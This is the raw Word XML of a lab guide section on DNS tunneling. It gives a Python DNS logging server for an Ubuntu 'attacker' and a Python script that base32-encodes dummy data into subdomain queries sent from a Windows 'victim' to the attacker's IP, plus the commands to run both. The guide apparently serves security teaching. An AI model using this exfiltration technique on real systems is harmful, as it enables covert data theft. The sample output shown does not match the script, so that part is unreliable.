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11" w:rsidRPr="00660B11" w:rsidRDefault="00660B11" w:rsidP="008653E5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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="007C317F" w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00660B11">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>DNS Tunneling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="008653E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bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Ubuntu machine (running DNS server to capture exfiltrated data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="008653E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bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Victim</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Windows machine (sends encoded data using DNS queries)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="008653E5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B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B5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0F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Data Exfiltration via DNS Subdomain from Windows → Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55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0F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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>[Windows VM]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|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</w:t>
      </w:r>
      <w:r w:rsidR="008653E5" w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>| DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Query with Encoded Data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V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>[Ubuntu VM (DNS server)]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|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</w:t>
      </w:r>
      <w:r w:rsidR="008653E5" w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>| Capture</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Query &amp; Decode Subdomain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V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>[Data Reconstructed]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55FB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B55FB" w:rsidRPr="000F4775" w:rsidRDefault="008653E5" w:rsidP="003B5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0F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B55FB" w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set Up DNS Server on Ubuntu (Attacker)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55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0F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1: Install dnslib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sudo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apt update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pip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install dnslib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55FB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B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55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0F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 2: Python DNS Logger Script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55F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>Save this as dns_server.py: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from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dnslib.server import DNSServer, DNSLogger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from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dnslib import DNSRecord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import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datetime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class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DNSCaptureHandler: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def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resolve(self, request, handler):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    </w:t>
      </w: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qname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= str(request.q.qname)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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w: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now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= datetime.datetime.now().strftime("%H:%M:%S")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    </w:t>
      </w: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print(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>f"[{now}] DNS Query Received: {qname}")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    </w:t>
      </w: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return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DNSRecord.question(qname)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if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__name__ == "__main__":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resolver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= DNSCaptureHandler()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logger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= DNSLogger(log="request")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server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= DNSServer(resolver, port=53, address="0.0.0.0", logger=logger)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print(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>"[*] DNS Server running on port 53...")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server.start()</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55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0F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3: Run the DNS Server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sudo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python3 dns_server.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55FB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8653E5" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="008653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0F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Simulate Exfiltration from Windows (Victim)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="008653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0F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1: Install Python on Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55F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Use </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="000F4775">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>python.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and add Python to PATH.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pip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install dnspython</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55FB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B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55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0F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 2: Exfiltration Script (Windows)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import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dns.resolver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import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base64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># Data to exfiltrate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data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= "SecretMessage123"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encoded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= base64.b32encode(data.encode()).decode().strip('=')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># Chunk the data if needed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>domain = f"{</w:t>
      </w:r>
      <w:r w:rsidR="008653E5" w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encoded.lower (</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)}.exfil.lab"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># Set the attacker's (Ubuntu) DNS server IP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resolver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= dns.resolver.Resolver()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>resolver.nameservers = ['192.168.1.100'</w:t>
      </w:r>
      <w:r w:rsidR="008653E5" w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>] #</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;-- Replace with Ubuntu machine IP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try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>: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w: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resolver.resolve(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>domain, 'A')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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>f"Sent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS Query: {domain}")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except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Exception as e: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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>f"Query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Failed: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55F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>Save it as exfiltrate.py and run from CMD or PowerShell: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python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exfiltrate.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55FB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B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B5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0F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What You Should See on Ubuntu Terminal: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>[*] DNS Server running on port 53...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>[13:21:42] DNS Query Received: knfwk3dfmqqgk===.exfil.lab.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55F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F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You can decode it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B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F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000F4775">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'KNFWK3DFMQQGK===' | base32 -d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55FB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B55FB" w:rsidRPr="000F4775" w:rsidRDefault="003B55FB" w:rsidP="003B55FB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E103A9" w:rsidRPr="000F4775" w:rsidRDefault="00E103A9" w:rsidP="008653E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</w:p>
    <w:sectPr w:rsidR="00E103A9" w:rsidRPr="000F4775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4796D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F0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EE765E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3820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3F6B4E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E10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55FB"/>
    <w:rsid w:val="000F4775"/>
    <w:rsid w:val="00221CFD"/>
    <w:rsid w:val="003B55FB"/>
    <w:rsid w:val="004A1D39"/>
    <w:rsid w:val="005E3F23"/>
    <w:rsid w:val="00660B11"/>
    <w:rsid w:val="007C317F"/>
    <w:rsid w:val="008653E5"/>
    <w:rsid w:val="00951262"/>
    <w:rsid w:val="00E10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3B55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B55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5F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B55F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B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B55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5F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B55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55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5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327</Words>
  <Characters>1869</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>15</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>HP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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-13T17:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-14T04:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>